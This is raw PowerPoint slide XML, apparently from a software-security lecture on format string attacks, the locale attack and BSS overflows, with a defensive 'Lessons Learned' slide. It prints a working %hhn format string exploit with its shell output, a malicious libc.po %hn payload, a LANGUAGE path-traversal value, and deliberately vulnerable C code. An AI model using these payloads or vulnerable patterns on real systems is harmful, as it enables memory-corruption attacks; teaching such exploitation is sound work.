        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5441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String Exploitation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Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x97\x04\x08\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x97\x04\x08\xd9\x97\x04\x08DDDD" + "%239x%2\$hhn%3\$hhn%203x%4\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"'` | ./format-simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ &lt;same as before&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ cat test - | ./format-simple </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>adamd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>=500(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>adamd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>=500(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>adamd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) groups=500(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>adamd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023</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272</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40348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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>locale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1000451" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The localization system contains a database to translate error messages, formats, etc. in a language other than English</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g.: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/lib/locale/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>it_IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/LC_MESSAGES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is possible to specify the language in the language variable (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>LANGUAGE=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>it_IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When an error is found the language database is searched  for the right message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In a vulnerable implementation, it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>was possible to specify a user-provided language file</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>LANGUAGE=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>it_IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80184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0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0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04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0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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>LC_MESSAGE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>libc.po</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>msgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "%s: invalid option -- %c\n"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>msgstr”%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%63222c%hn%50561c%hn\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110011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24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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lessons Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1011715" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Whenever an attacker can control the format string of a function such as *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() and syslog(), there is the potential for a format string vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fprintf(f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) BAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(f, “%s”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>name_str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) GOOD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var_i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var_j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) still BAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>string attacks are made possible by the lack of parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41495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1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1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1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1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17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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Where is Overwritten: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DATA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and BSS Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630787" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>#define MAX_STR_LENGTH 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/* These variables will be allocated in the BSS */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>static char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>buffer[MAX_STR_LENGTH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>static char *filename; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>main(int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>[]) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = 0, count = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>read_buf[BUFSIZE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  filename = argv[1];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>checkfile(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(buffer, argv[2]); // overwrites *filename</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>open(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
